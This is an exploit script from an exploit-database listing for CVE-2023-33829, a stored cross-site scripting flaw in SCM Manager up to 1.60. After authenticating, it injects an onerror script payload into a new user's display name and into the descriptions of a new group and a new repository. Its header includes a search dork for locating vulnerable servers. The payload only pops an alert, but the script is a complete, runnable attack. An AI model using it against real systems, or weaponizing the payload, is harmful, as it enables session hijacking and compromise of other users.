Share
## https://sploitus.com/exploit?id=PACKETSTORM:172588
#!/usr/bin/python3  
  
# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)  
# Google Dork: intitle:"SCM Manager" intext:1.60  
# Date: 05-25-2023  
# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)  
# Vendor Homepage: https://scm-manager.org/  
# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/  
# Version: 1.2 <= 1.60  
# Tested on: Debian based  
# CVE: CVE-2023-33829  
  
# Modules  
import requests  
import argparse  
import sys  
  
# Main menu  
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')  
parser.add_argument("-u", "--user", help="Admin user or user with write permissions")  
parser.add_argument("-p", "--password", help="password of the user")  
args = parser.parse_args()  
  
  
# Credentials  
user = sys.argv[2]  
password = sys.argv[4]  
  
  
# Global Variables  
main_url = "http://localhost:8080/scm" # Change URL if its necessary  
auth_url = main_url + "/api/rest/authentication/login.json"  
users = main_url + "/api/rest/users.json"  
groups = main_url + "/api/rest/groups.json"  
repos = main_url + "/api/rest/repositories.json"  
  
# Create a session  
session = requests.Session()  
  
# Credentials to send  
post_data={  
'username': user, # change if you have any other user with write permissions  
'password': password # change if you have any other user with write permissions  
}  
  
r = session.post(auth_url, data=post_data)  
  
if r.status_code == 200:  
print("[+] Authentication successfully")  
else:  
print("[-] Failed to authenticate")  
sys.exit(1)  
  
new_user={  
  
"name": "newUser",  
"displayName": "<img src=x onerror=alert('XSS')>",  
"mail": "",  
"password": "",  
"admin": False,  
"active": True,  
"type": "xml"  
  
}  
  
create_user = session.post(users, json=new_user)  
print("[+] User with XSS Payload created")  
  
new_group={  
  
"name": "newGroup",  
"description": "<img src=x onerror=alert('XSS')>",  
"type": "xml"  
  
}  
  
create_group = session.post(groups, json=new_group)  
print("[+] Group with XSS Payload created")  
  
new_repo={  
  
"name": "newRepo",  
"type": "svn",  
"contact": "",  
"description": "<img src=x onerror=alert('XSS')>",  
"public": False  
  
}  
  
create_repo = session.post(repos, json=new_repo)  
print("[+] Repository with XSS Payload created")